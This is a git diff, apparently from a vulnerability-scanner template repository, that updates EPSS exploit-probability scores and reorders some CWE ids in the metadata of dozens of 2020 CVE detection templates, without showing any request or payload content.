a/http/cves/2020/CVE-2020-35338.yaml b/http/cves/2020/CVE-2020-35338.yaml index aec3d187ef..124a77ccd9 100644 --- a/http/cves/2020/CVE-2020-35338.yaml +++ b/http/cves/2020/CVE-2020-35338.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-35338 cwe-id: CWE-798 epss-score: 0.25616 - epss-percentile: 0.96236 + epss-percentile: 0.96262 cpe: cpe:2.3:a:mobileviewpoint:wireless_multiplex_terminal_playout_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml index 099051752b..a1075e002d 100644 --- a/http/cves/2020/CVE-2020-35476.yaml +++ b/http/cves/2020/CVE-2020-35476.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-35476 cwe-id: CWE-78 epss-score: 0.95741 - epss-percentile: 0.99272 + epss-percentile: 0.99293 cpe: cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-35489.yaml b/http/cves/2020/CVE-2020-35489.yaml index 6073faed30..5a923f57b2 100644 --- a/http/cves/2020/CVE-2020-35489.yaml +++ b/http/cves/2020/CVE-2020-35489.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-35489 cwe-id: CWE-434 epss-score: 0.88428 - epss-percentile: 0.98401 + epss-percentile: 0.98435 cpe: cpe:2.3:a:rocklobster:contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35580.yaml b/http/cves/2020/CVE-2020-35580.yaml index db246ba91b..85ef779cf0 100644 --- a/http/cves/2020/CVE-2020-35580.yaml +++ b/http/cves/2020/CVE-2020-35580.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-35580 cwe-id: CWE-22 - epss-score: 0.02597 - epss-percentile: 0.89128 + epss-score: 0.02047 + epss-percentile: 0.87773 cpe: cpe:2.3:a:searchblox:searchblox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35598.yaml b/http/cves/2020/CVE-2020-35598.yaml index 21f9a0107b..4c7b7351da 100644 --- a/http/cves/2020/CVE-2020-35598.yaml +++ b/http/cves/2020/CVE-2020-35598.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-35598 cwe-id: CWE-22 epss-score: 0.10448 - epss-percentile: 0.94429 + epss-percentile: 0.94458 cpe: cpe:2.3:a:advanced_comment_system_project:advanced_comment_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35713.yaml b/http/cves/2020/CVE-2020-35713.yaml index d391a16ea5..c096c685fc 100644 --- a/http/cves/2020/CVE-2020-35713.yaml +++ b/http/cves/2020/CVE-2020-35713.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-35713 cwe-id: CWE-78 epss-score: 0.9714 - epss-percentile: 0.99749 + epss-percentile: 0.99756 cpe: cpe:2.3:o:linksys:re6500_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35729.yaml b/http/cves/2020/CVE-2020-35729.yaml index 96ed0eb917..1f3aa41608 100644 --- a/http/cves/2020/CVE-2020-35729.yaml +++ b/http/cves/2020/CVE-2020-35729.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35729 cwe-id: CWE-78 - epss-score: 0.95886 - epss-percentile: 0.99305 + epss-score: 0.95554 + epss-percentile: 0.99252 cpe: cpe:2.3:a:klogserver:klog_server:2.4.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35736.yaml b/http/cves/2020/CVE-2020-35736.yaml index d53cfe17ac..5a5f990ac2 100644 --- a/http/cves/2020/CVE-2020-35736.yaml +++ b/http/cves/2020/CVE-2020-35736.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-35736 cwe-id: CWE-22 epss-score: 0.01204 - epss-percentile: 0.83592 + epss-percentile: 0.83699 cpe: cpe:2.3:a:liftoffsoftware:gateone:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35749.yaml b/http/cves/2020/CVE-2020-35749.yaml index ab447c3ee1..97f7175e65 100644 --- a/http/cves/2020/CVE-2020-35749.yaml +++ b/http/cves/2020/CVE-2020-35749.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-35749 cwe-id: CWE-22 epss-score: 0.02144 - epss-percentile: 0.88061 + epss-percentile: 0.88116 cpe: cpe:2.3:a:presstigers:simple_board_job:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-35774.yaml b/http/cves/2020/CVE-2020-35774.yaml index 04af26fb6c..95a383f8f9 100644 --- a/http/cves/2020/CVE-2020-35774.yaml +++ b/http/cves/2020/CVE-2020-35774.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-35774 cwe-id: CWE-79 epss-score: 0.97127 - epss-percentile: 0.99743 + epss-percentile: 0.99751 cpe: cpe:2.3:a:twitter:twitter-server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-3580.yaml b/http/cves/2020/CVE-2020-3580.yaml index a282eb46a8..56ecec7d33 100644 --- a/http/cves/2020/CVE-2020-3580.yaml +++ b/http/cves/2020/CVE-2020-3580.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-3580 cwe-id: CWE-79 epss-score: 0.97048 - epss-percentile: 0.99697 + epss-percentile: 0.99705 cpe: cpe:2.3:o:cisco:firepower_threat_defense:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35846.yaml b/http/cves/2020/CVE-2020-35846.yaml index 245c5c1018..8a1729be34 100644 --- a/http/cves/2020/CVE-2020-35846.yaml +++ b/http/cves/2020/CVE-2020-35846.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35846 cwe-id: CWE-89 - epss-score: 0.82538 - epss-percentile: 0.98102 + epss-score: 0.85589 + epss-percentile: 0.98278 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35847.yaml b/http/cves/2020/CVE-2020-35847.yaml index 495374ecbc..861a7652bf 100644 --- a/http/cves/2020/CVE-2020-35847.yaml +++ b/http/cves/2020/CVE-2020-35847.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35847 cwe-id: CWE-89 - epss-score: 0.74725 - epss-percentile: 0.97846 + epss-score: 0.78248 + epss-percentile: 0.97966 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-35848.yaml b/http/cves/2020/CVE-2020-35848.yaml index 58744d98df..1c5a44d970 100644 --- a/http/cves/2020/CVE-2020-35848.yaml +++ b/http/cves/2020/CVE-2020-35848.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35848 cwe-id: CWE-89 - epss-score: 0.71273 - epss-percentile: 0.97742 + epss-score: 0.76291 + epss-percentile: 0.97909 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35951.yaml b/http/cves/2020/CVE-2020-35951.yaml index 3271793a4e..a4f5f3d3f1 100644 --- a/http/cves/2020/CVE-2020-35951.yaml +++ b/http/cves/2020/CVE-2020-35951.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-35951 cwe-id: CWE-306 epss-score: 0.00174 - epss-percentile: 0.54436 + epss-percentile: 0.54591 cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:* metadata: max-request: 4 diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml index ee43a1e51e..9a957ae122 100644 --- a/http/cves/2020/CVE-2020-35984.yaml +++ b/http/cves/2020/CVE-2020-35984.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-35984 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.4702 + epss-percentile: 0.47131 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index 49dd7f35c0..a31760e7b0 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-35985 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.4702 + epss-percentile: 0.47131 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index 1387bdfe6d..5e2ff09989 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-35986 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.4702 + epss-percentile: 0.47131 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml index b79fba21c5..feca9c39cb 100644 --- a/http/cves/2020/CVE-2020-35987.yaml +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-35987 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.4702 + epss-percentile: 0.47131 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-36112.yaml b/http/cves/2020/CVE-2020-36112.yaml index 8f22484694..d8327235f1 100644 --- a/http/cves/2020/CVE-2020-36112.yaml +++ b/http/cves/2020/CVE-2020-36112.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-36112 cwe-id: CWE-89 epss-score: 0.40407 - epss-percentile: 0.96921 + epss-percentile: 0.9694 cpe: cpe:2.3:a:cse_bookstore_project:cse_bookstore:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-36289.yaml b/http/cves/2020/CVE-2020-36289.yaml index 5ad1e5b374..b98e304aa3 100644 --- a/http/cves/2020/CVE-2020-36289.yaml +++ b/http/cves/2020/CVE-2020-36289.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.3 cve-id: CVE-2020-36289 cwe-id: CWE-863 - epss-score: 0.91152 - epss-percentile: 0.98597 + epss-score: 0.9043 + epss-percentile: 0.9857 cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml index b1b1856d0f..e5040e99bf 100644 --- a/http/cves/2020/CVE-2020-36365.yaml +++ b/http/cves/2020/CVE-2020-36365.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-36365 cwe-id: CWE-601 - epss-score: 0.00331 - epss-percentile: 0.67877 + epss-score: 0.00244 + epss-percentile: 0.62286 cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml index f1d9dbff70..4fc47a74d8 100644 --- a/http/cves/2020/CVE-2020-36510.yaml +++ b/http/cves/2020/CVE-2020-36510.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-36510 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42757 + epss-percentile: 0.42838 cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:wordpress:*:* metadata: verified: "false" diff --git a/http/cves/2020/CVE-2020-4463.yaml b/http/cves/2020/CVE-2020-4463.yaml index 99c51c5642..fa700ff418 100644 --- a/http/cves/2020/CVE-2020-4463.yaml +++ b/http/cves/2020/CVE-2020-4463.yaml @@ -24,8 +24,8 @@ info: cvss-score: 8.2 cve-id: CVE-2020-4463 cwe-id: CWE-611 - epss-score: 0.71269 - epss-percentile: 0.97741 + epss-score: 0.76538 + epss-percentile: 0.97916 cpe: cpe:2.3:a:ibm:maximo_asset_management:7.6.0.1:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-5191.yaml b/http/cves/2020/CVE-2020-5191.yaml index 9b0b1a5645..1f69926b63 100644 --- a/http/cves/2020/CVE-2020-5191.yaml +++ b/http/cves/2020/CVE-2020-5191.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-5191 cwe-id: CWE-79 epss-score: 0.00345 - epss-percentile: 0.68461 + epss-percentile: 0.68617 cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-5192.yaml b/http/cves/2020/CVE-2020-5192.yaml index 0549e17bb3..d69b261061 100644 --- a/http/cves/2020/CVE-2020-5192.yaml +++ b/http/cves/2020/CVE-2020-5192.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-5192 cwe-id: CWE-89 epss-score: 0.38401 - epss-percentile: 0.96857 + epss-percentile: 0.96878 cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-5284.yaml b/http/cves/2020/CVE-2020-5284.yaml index 5c6c723e6d..b972f11380 100644 --- a/http/cves/2020/CVE-2020-5284.yaml +++ b/http/cves/2020/CVE-2020-5284.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-5284 cwe-id: CWE-22,CWE-23 epss-score: 0.00152 - epss-percentile: 0.5127 + epss-percentile: 0.51361 cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5307.yaml b/http/cves/2020/CVE-2020-5307.yaml index e91e989bda..55214acfa5 100644 --- a/http/cves/2020/CVE-2020-5307.yaml +++ b/http/cves/2020/CVE-2020-5307.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-5307 cwe-id: CWE-89 - epss-score: 0.02037 - epss-percentile: 0.87706 + epss-score: 0.01863 + epss-percentile: 0.87061 cpe: cpe:2.3:a:phpgurukul:dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5405.yaml b/http/cves/2020/CVE-2020-5405.yaml index 85238b71d2..436e545eed 100644 --- a/http/cves/2020/CVE-2020-5405.yaml +++ b/http/cves/2020/CVE-2020-5405.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-5405 cwe-id: CWE-22,CWE-23 epss-score: 0.00258 - epss-percentile: 0.63361 + epss-percentile: 0.63514 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5410.yaml b/http/cves/2020/CVE-2020-5410.yaml index 88cd4a5de6..907dd7d078 100644 --- a/http/cves/2020/CVE-2020-5410.yaml +++ b/http/cves/2020/CVE-2020-5410.yaml @@ -16,9 +16,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-5410 - cwe-id: CWE-22,CWE-23 + cwe-id: CWE-23,CWE-22 epss-score: 0.96876 - epss-percentile: 0.9963 + epss-percentile: 0.99641 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5412.yaml b/http/cves/2020/CVE-2020-5412.yaml index d6ccf3db15..b2d3ed5a5c 100644 --- a/http/cves/2020/CVE-2020-5412.yaml +++ b/http/cves/2020/CVE-2020-5412.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.5 cve-id: CVE-2020-5412 cwe-id: CWE-610,CWE-441 - epss-score: 0.4867 - epss-percentile: 0.97183 + epss-score: 0.36725 + epss-percentile: 0.96805 cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5775.yaml b/http/cves/2020/CVE-2020-5775.yaml index 1f0798ae92..0cc6f852d9 100644 --- a/http/cves/2020/CVE-2020-5775.yaml +++ b/http/cves/2020/CVE-2020-5775.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-5775 cwe-id: CWE-918 epss-score: 0.00194 - epss-percentile: 0.57038 + epss-percentile: 0.5721 cpe: cpe:2.3:a:instructure:canvas_learning_management_service:2020-07-29:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5776.yaml b/http/cves/2020/CVE-2020-5776.yaml index 3b32fc90ea..9e3e4dcbf0 100644 --- a/http/cves/2020/CVE-2020-5776.yaml +++ b/http/cves/2020/CVE-2020-5776.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-5776 cwe-id: CWE-352 epss-score: 0.53796 - epss-percentile: 0.97302 + epss-percentile: 0.97325 cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml index a2f1e202fb..4500e4225b 100644 --- a/http/cves/2020/CVE-2020-5777.yaml +++ b/http/cves/2020/CVE-2020-5777.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-5777 cwe-id: CWE-287 - epss-score: 0.02889 - epss-percentile: 0.8967 + epss-score: 0.04038 + epss-percentile: 0.91193 cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5847.yaml b/http/cves/2020/CVE-2020-5847.yaml index c54fbe67bd..d089ad8539 100644 --- a/http/cves/2020/CVE-2020-5847.yaml +++ b/http/cves/2020/CVE-2020-5847.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-5847 cwe-id: CWE-94,CWE-668 epss-score: 0.97053 - epss-percentile: 0.99699 + epss-percentile: 0.99707 cpe: cpe:2.3:a:unraid:unraid:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5902.yaml b/http/cves/2020/CVE-2020-5902.yaml index a6936c41ad..cf62f76287 100644 --- a/http/cves/2020/CVE-2020-5902.yaml +++ b/http/cves/2020/CVE-2020-5902.yaml @@ -28,7 +28,7 @@ info: cve-id: CVE-2020-5902 cwe-id: CWE-22 epss-score: 0.97555 - epss-percentile: 0.99997 + epss-percentile: 0.99998 cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: max-request: 8 diff --git a/http/cves/2020/CVE-2020-6171.yaml b/http/cves/2020/CVE-2020-6171.yaml index 5fbef6adf9..bc4ceac545 100644 --- a/http/cves/2020/CVE-2020-6171.yaml +++ b/http/cves/2020/CVE-2020-6171.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-6171 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48439 + epss-percentile: 0.48556 cpe: cpe:2.3:a:communilink:clink_office:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-6207.yaml b/http/cves/2020/CVE-2020-6207.yaml index 588379f8de..554ed6da73 100644 --- a/http/cves/2020/CVE-2020-6207.yaml +++ b/http/cves/2020/CVE-2020-6207.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2020-6207 cwe-id: CWE-306 epss-score: 0.97437 - epss-percentile: 0.99937 + epss-percentile: 0.99941 cpe: cpe:2.3:a:sap:solution_manager:7.20:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-6287.yaml b/http/cves/2020/CVE-2020-6287.yaml index 98634f2801..9359fb663a 100644 --- a/http/cves/2020/CVE-2020-6287.yaml +++ b/http/cves/2020/CVE-2020-6287.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-6287 cwe-id: CWE-306 epss-score: 0.97274 - epss-percentile: 0.99828 + epss-percentile: 0.9983 cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-6308.yaml b/http/cves/2020/CVE-2020-6308.yaml index 682a8eeb1a..b570d7bf44 100644 --- a/http/cves/2020/CVE-2020-6308.yaml +++ b/http/cves/2020/CVE-2020-6308.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-6308 cwe-id: CWE-918 epss-score: 0.00306 - epss-percentile: 0.6646 + epss-percentile: 0.66636 cpe: cpe:2.3:a:sap:businessobjects_business_intelligence_platform:4.1:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-6637.yaml b/http/cves/2020/CVE-2020-6637.yaml index de2f8f7f56..9d20e71ed3 100644 --- a/http/cves/2020/CVE-2020-6637.yaml +++ b/http/cves/2020/CVE-2020-6637.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-6637 cwe-id: CWE-89 - epss-score: 0.02003 - epss-percentile: 0.87583 + epss-score: 0.02408 + epss-percentile: 0.88811 cpe: cpe:2.3:a:os4ed:opensis:7.3:*:*:*:community:*:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-6950.yaml b/http/cves/2020/CVE-2020-6950.yaml index 419e79cd37..7fe0b08435 100644 --- a/http/cves/2020/CVE-2020-6950.yaml +++ b/http/cves/2020/CVE-2020-6950.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.5 cve-id: CVE-2020-6950 cwe-id: CWE-22 - epss-score: 0.03613 - epss-percentile: 0.90666 + epss-score: 0.04665 + epss-percentile: 0.91775 cpe: cpe:2.3:a:eclipse:mojarra:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index 1c518eb5ff..024764504c 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-7107 cwe-id: CWE-79 epss-score: 0.00395 - epss-percentile: 0.70478 + epss-percentile: 0.70653 cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-7136.yaml b/http/cves/2020/CVE-2020-7136.yaml index fba779e107..f1f53f9d5d 100644 --- a/http/cves/2020/CVE-2020-7136.yaml +++ b/http/cves/2020/CVE-2020-7136.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-7136 cwe-id: CWE-288 epss-score: 0.21561 - epss-percentile: 0.95966 + epss-percentile: 0.96003 cpe: cpe:2.3:a:hpe:smart_update_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-7209.yaml b/http/cves/2020/CVE-2020-7209.yaml index cf783a58f8..a61fe80016 100644 --- a/http/cves/2020/CVE-2020-7209.yaml +++ b/http/cves/2020/CVE-2020-7209.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-7209 - epss-score: 0.97092 - epss-percentile: 0.99721 + epss-score: 0.9719 + epss-percentile: 0.99779 cpe: cpe:2.3:a:hp:linuxki:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-7318.yaml b/http/cves/2020/CVE-2020-7318.yaml index c3ed9c321f..bfec8f86ef 100644 --- a/http/cves/2020/CVE-2020-7318.yaml +++ b/http/cves/2020/CVE-2020-7318.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-7318 cwe-id: CWE-79 epss-score: 0.00065 - epss-percentile: 0.27029 + epss-percentile: 0.26966 cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml index ee9777a952..1dcaa14062 100644 --- a/http/cves/2020/CVE-2020-7796.yaml +++ b/http/cves/2020/CVE-2020-7796.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-7796 cwe-id: CWE-918 epss-score: 0.72496 - epss-percentile: 0.97769 + epss-percentile: 0.97801 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-7943.yaml b/http/cves/2020/CVE-2020-7943.yaml index 9b4253b2e7..f81fa82d6d 100644 --- a/http/cves/2020/CVE-2020-7943.yaml +++ b/http/cves/2020/CVE-2020-7943.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-7943 cwe-id: CWE-276,NVD-CWE-noinfo epss-score: 0.08068 - epss-percentile: 0.93652 + epss-percentile: 0.93691 cpe: cpe:2.3:a:puppet:puppet_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-7961.yaml b/http/cves/2020/CVE-2020-7961.yaml index a6f582fded..5dd3f83d30 100644 --- a/http/cves/2020/CVE-2020-7961.yaml +++ b/http/cves/2020/CVE-2020-7961.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-7961 cwe-id: CWE-502 epss-score: 0.97342 - epss-percentile: 0.99871 + epss-percentile: 0.99876 cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:community:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml index a99af0e010..662ac4b2d5 100644 --- a/http/cves/2020/CVE-2020-7980.yaml +++ b/http/cves/2020/CVE-2020-7980.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7980 cwe-id: CWE-78 - epss-score: 0.96915 - epss-percentile: 0.99647 + epss-score: 0.97015 + epss-percentile: 0.99691 cpe: cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index ec3b000f8a..98ff5179c7 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-8115 cwe-id: CWE-79 epss-score: 0.0187 - epss-percentile: 0.87032 + epss-percentile: 0.87084 cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8163.yaml b/http/cves/2020/CVE-2020-8163.yaml index 8a69114608..c14c948206 100644 --- a/http/cves/2020/CVE-2020-8163.yaml +++ b/http/cves/2020/CVE-2020-8163.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-8163 cwe-id: CWE-94 - epss-score: 0.9691 - epss-percentile: 0.99645 + epss-score: 0.97016 + epss-percentile: 0.99691 cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8191.yaml b/http/cves/2020/CVE-2020-8191.yaml index 4975a714ed..7bdf8f2888 100644 --- a/http/cves/2020/CVE-2020-8191.yaml +++ b/http/cves/2020/CVE-2020-8191.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-8191 cwe-id: CWE-79 epss-score: 0.0021 - epss-percentile: 0.58718 + epss-percentile: 0.58876 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8193.yaml b/http/cves/2020/CVE-2020-8193.yaml index 3bce2b99ac..2513bb0b60 100644 --- a/http/cves/2020/CVE-2020-8193.yaml +++ b/http/cves/2020/CVE-2020-8193.yaml @@ -18,9 +18,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cve-id: CVE-2020-8193 - cwe-id: CWE-284,CWE-287 - epss-score: 0.93981 - epss-percentile: 0.98944 + cwe-id: CWE-287,CWE-284 + epss-score: 0.93307 + epss-percentile: 0.9889 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 6 diff --git a/http/cves/2020/CVE-2020-8194.yaml b/http/cves/2020/CVE-2020-8194.yaml index dac83359cc..cf8434c699 100644 --- a/http/cves/2020/CVE-2020-8194.yaml +++ b/http/cves/2020/CVE-2020-8194.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-8194 cwe-id: CWE-94 epss-score: 0.90775 - epss-percentile: 0.98558 + epss-percentile: 0.98597 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-8209.yaml b/http/cves/2020/CVE-2020-8209.yaml index ad29fa152b..82ec33f1ef 100644 --- 